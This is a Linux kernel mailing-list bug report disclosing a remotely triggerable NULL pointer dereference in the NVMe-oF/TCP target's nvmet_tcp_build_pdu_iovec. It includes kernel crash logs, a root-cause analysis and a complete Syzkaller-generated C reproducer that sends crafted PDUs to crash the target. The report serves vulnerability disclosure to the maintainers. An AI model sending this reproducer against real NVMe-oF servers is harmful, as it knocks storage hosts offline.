[Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in `nvmet_tcp_build_iovec`

Alon Zahavi zahavi.alon at gmail.com
Mon Nov 6 05:40:49 PST 2023


# Bug Overview

## The Bug
A null-ptr-deref in `nvmet_tcp_build_iovec`.

## Bug Location
`drivers/nvme/target/tcp.c` in the function `nvmet_tcp_build_iovec`.

## Bug Class
Remote Denial of Service

## Disclaimer:
This bug was found using Syzkaller with NVMe-oF/TCP added support.

# Technical Details

## Kernel Report - NULL Pointer Dereference
```
[  157.833470] BUG: kernel NULL pointer dereference, address:
000000000000000c
[  157.833478] #PF: supervisor read access in kernel mode
[  157.833484] #PF: error_code(0x0000) - not-present page
[  157.833490] PGD 126e40067 P4D 126e40067 PUD 130d16067 PMD 0
[  157.833506] Oops: 0000 [#1] PREEMPT SMP NOPTI
[  157.833515] CPU: 3 PID: 3067 Comm: kworker/3:3H Kdump: loaded Not
tainted 6.5.0-rc1+ #5
[  157.833525] Hardware name: VMware, Inc. VMware Virtual
Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[  157.833532] Workqueue: nvmet_tcp_wq nvmet_tcp_io_work
[  157.833546] RIP: 0010:nvmet_tcp_build_pdu_iovec+0x7a/0x120
[  157.833558] Code: fe 44 89 a3 20 02 00 00 49 c1 e4 05 4c 03 63 30
4c 89 75 d0 41 89 c6 e8 34 b8 18 ff 45 85 ff 0f 84 99 00 00 00 e8 06
bd 18 ff <41> 8b 74 24 0c 41 8b 44 24 08 4c 89 e7 49 8b 0c 24 89 f2 41
89 75
[  157.833568] RSP: 0018:ffffc9001ab83c28 EFLAGS: 00010293
[  157.833576] RAX: 0000000000000000 RBX: ffff88812b9583e0 RCX: 0000000000000000
[  157.833584] RDX: ffff888131b10000 RSI: ffffffff82191dda RDI: ffffffff82191dcc
[  157.833591] RBP: ffffc9001ab83c58 R08: 0000000000000005 R09: 0000000000000000
[  157.833598] R10: 0000000000000007 R11: 0000000000000000 R12: 0000000000000000
[  157.833605] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000007
[  157.833612] FS:  0000000000000000(0000) GS:ffff888233f80000(0000)
knlGS:0000000000000000
[  157.833630] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  157.833638] CR2: 000000000000000c CR3: 0000000122dd4002 CR4: 00000000007706e0
[  157.833659] PKRU: 55555554
[  157.833686] Call Trace:
[  157.833691]  <TASK>
[  157.833712]  ? show_regs+0x6e/0x80
[  157.833745]  ? __die+0x29/0x70
[  157.833757]  ? page_fault_oops+0x278/0x740
[  157.833784]  ? up+0x3b/0x70
[  157.833835]  ? do_user_addr_fault+0x63b/0x1040
[  157.833846]  ? __sanitizer_cov_trace_const_cmp4+0x1a/0x20
[  157.833862]  ? irq_work_queue+0x95/0xc0
[  157.833874]  ? exc_page_fault+0xcf/0x390
[  157.833889]  ? asm_exc_page_fault+0x2b/0x30
[  157.833925]  ? nvmet_tcp_build_pdu_iovec+0x7a/0x120
[  157.833958]  ? nvmet_tcp_build_pdu_iovec+0x6c/0x120
[  157.833971]  ? nvmet_tcp_build_pdu_iovec+0x7a/0x120
[  157.833998]  ? nvmet_tcp_build_pdu_iovec+0x7a/0x120
[  157.834011]  nvmet_tcp_try_recv_pdu+0x995/0x1310
[  157.834066]  nvmet_tcp_io_work+0xe6/0xd90
[  157.834081]  process_one_work+0x3da/0x870
[  157.834112]  worker_thread+0x67/0x640
[  157.834124]  kthread+0x164/0x1b0
[  157.834138]  ? __pfx_worker_thread+0x10/0x10
[  157.834148]  ? __pfx_kthread+0x10/0x10
[  157.834162]  ret_from_fork+0x29/0x50
[  157.834180]  </TASK>
```

## Description

### Tracing The Bug
As written above, the bug occurs during the execution of
nvmet_tcp_build_iovec. Looking at the kernel logs report we can see
the exact line of code that triggers the bug.

Code Block 1:
```
static void nvmet_tcp_build_pdu_iovec(struct nvmet_tcp_cmd *cmd)
{
  ...
  sg = &cmd->req.sg[cmd->sg_idx]; // #1

  while (length) {
    u32 iov_len = min_t(u32, length, sg->length - sg_offset); // #2
  ...
  }
...
}
```
Breakdown:

1. The variable `sg` is getting the value of  `&cmd->req.sg[cmd->sg_idx]`.
At the assembly level (intel flavor):
```
mov    DWORD PTR [rbx+0x220], r12d     ; r12 holds the `cmd` address
add    r12, QWORD PTR [rbx+0x30]          ; adding the value of
`req.sg[cmd->sg_idx]`
```

However, `cmd->req.sg` is NULL at this point of execution thus `sg`
will point to `0 + cmd->sg_idx`, which will most likely be either 0x0
or 0x1, a non-accessible memory addresses.

2. After moving the address into `sg` the driver will dereference it
later, inside the while loop.
```
mov    esi, DWORD PTR [r12+0xc]
```
When getting here, `r12` will point into (probably) 0x0. This means
that the CPU will try to access the memory address 0xC and will
trigger a NULL pointer dereference.


## Root Cause
`req` is initialized during `nvmet_req_init`. However, the sequence
that leads into `nvmet_tcp_build_iovec` does not contain any call for
`nvmet_req_init`, thus crashing the kernel with NULL pointer
dereference. This flow of execution can also create a situation where
an uninitialized memory address will be dereferenced, which has
undefined behaviour.

## Reproducer
I am adding a reproducer generated by Syzkaller with some
optimizations and minor changes.

```
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#include <linux/capability.h>

uint64_t r[1] = {0xffffffffffffffff};

void loop(void)
{
  intptr_t res = 0;
  res = syscall(__NR_socket, /*domain=*/2ul, /*type=*/1ul, /*proto=*/0);
  if (res != -1)
    r[0] = res;
  *(uint16_t*)0x20000100 = 2;
  *(uint16_t*)0x20000102 = htobe16(0x1144);
  *(uint32_t*)0x20000104 = htobe32(0x7f000001);
  syscall(__NR_connect, /*fd=*/r[0], /*addr=*/0x20000100ul, /*addrlen=*/0x10ul);
  *(uint8_t*)0x200001c0 = 0;
  *(uint8_t*)0x200001c1 = 0;
  *(uint8_t*)0x200001c2 = 0x80;
  *(uint8_t*)0x200001c3 = 0;
  *(uint32_t*)0x200001c4 = 0x80;
  *(uint16_t*)0x200001c8 = 0;
  *(uint8_t*)0x200001ca = 0;
  *(uint8_t*)0x200001cb = 0;
  *(uint32_t*)0x200001cc = 0;
  memcpy((void*)0x200001d0,
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
         "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
         "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35"
         "\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86"
         "\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf"
         "\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86\xcf\xbf"
         "\x35\x86\xcf\xbf\x35\x86\xcf\xbf\x35\x86",
         112);
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x200001c0ul, /*len=*/0x80ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
  *(uint8_t*)0x20000080 = 6;
  *(uint8_t*)0x20000081 = 3;
  *(uint8_t*)0x20000082 = 0x18;
  *(uint8_t*)0x20000083 = 0x1c;
  *(uint32_t*)0x20000084 = 2;
  *(uint16_t*)0x20000088 = 0x5d;
  *(uint16_t*)0x2000008a = 3;
  *(uint32_t*)0x2000008c = 0;
  *(uint32_t*)0x20000090 = 7;
  memcpy((void*)0x20000094, "\x83\x9e\x4f\x1a", 4);
  syscall(__NR_sendto, /*fd=*/r[0], /*pdu=*/0x20000080ul, /*len=*/0x80ul,
          /*f=*/0ul, /*addr=*/0ul, /*addrlen=*/0ul);
}
int main(void)
{
  syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=*/7ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=*/0x32ul, /*fd=*/-1, /*offset=*/0ul);
  loop();
  return 0;
}
```

### More information
When trying to reproduce the bug, this bug sometimes changes from a
null-ptr-deref into OOM (out of memory) panic.
This implies that there might be another memory corruption that also
happens before the dereferencing of NULL. I couldn't find the root
cause for the OOM bug. However, I am attaching the kernel log for that
bug below.
```
[    2.075100] Out of memory and no killable processes...
[    2.075107] Kernel panic - not syncing: System is deadlocked on memory
[    2.075303] CPU: 0 PID: 22 Comm: kworker/u2:1 Not tainted 6.5.0-rc1+ #5
[    2.075428] Hardware name: VMware, Inc. VMware Virtual
Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[    2.075608] Workqueue: eval_map_wq tracer_init_tracefs_work_func
[    2.075733] Call Trace:
[    2.075786]  <TASK>
[    2.075836]  dump_stack_lvl+0xaa/0x110
[    2.075921]  dump_stack+0x19/0x20
[    2.075997]  panic+0x567/0x5b0
[    2.076075]  ? out_of_memory+0xb01/0xb10
[    2.076167]  out_of_memory+0xb0d/0xb10
[    2.076272]  __alloc_pages+0xe87/0x1220
[    2.076358]  ? mark_held_locks+0x4d/0x80
[    2.076467]  alloc_pages+0xd7/0x200
[    2.076552]  allocate_slab+0x37e/0x500
[    2.076636]  ? mark_held_locks+0x4d/0x80
[    2.076726]  ? __sanitizer_cov_trace_const_cmp4+0x1a/0x20
[    2.076806]  ___slab_alloc+0x9c6/0x1250
[    2.076806]  ? __d_alloc+0x3d/0x2f0
[    2.076806]  kmem_cache_alloc_lru+0x45e/0x5d0
[    2.076806]  ? kmem_cache_alloc_lru+0x45e/0x5d0
[    2.076806]  ? __d_alloc+0x3d/0x2f0
[    2.076806]  __d_alloc+0x3d/0x2f0
[    2.076806]  ? __d_alloc+0x3d/0x2f0
[    2.076806]  d_alloc_parallel+0x75/0x1040
[    2.076806]  ? lockdep_init_map_type+0x50/0x240
[    2.076806]  __lookup_slow+0xf4/0x2a0
[    2.076806]  lookup_one_len+0xde/0x100
[    2.076806]  start_creating+0xaf/0x180
[    2.076806]  tracefs_create_file+0xa2/0x260
[    2.076806]  trace_create_file+0x38/0x70
[    2.076806]  event_create_dir+0x4c0/0x6e0
[    2.076806]  __trace_early_add_event_dirs+0x57/0x100
[    2.076806]  event_trace_init+0xe4/0x160
[    2.076806]  tracer_init_tracefs_work_func+0x15/0x440
[    2.076806]  process_one_work+0x3da/0x870
[    2.076806]  worker_thread+0x67/0x640
[    2.076806]  kthread+0x164/0x1b0
[    2.076806]  ? __pfx_worker_thread+0x10/0x10
[    2.076806]  ? __pfx_kthread+0x10/0x10
[    2.076806]  ret_from_fork+0x29/0x50
[    2.076806]  </TASK>
[    2.076806] ---[ end Kernel panic - not syncing: System is
deadlocked on memory ]---
```
In case you found out what caused the OOM, please let me know.

## About this report
This report is almost identical to another report I sent to you, with
the title "[Bug Report] NVMe-oF/TCP - NULL Pointer Dereference in
__nvmet_req_complete". The root cause seems to be the same, and both
bugs sometimes cause OOM kernel panic. If you think those bugs should
be addressed as one, please let me know.



More information about the Linux-nvme mailing list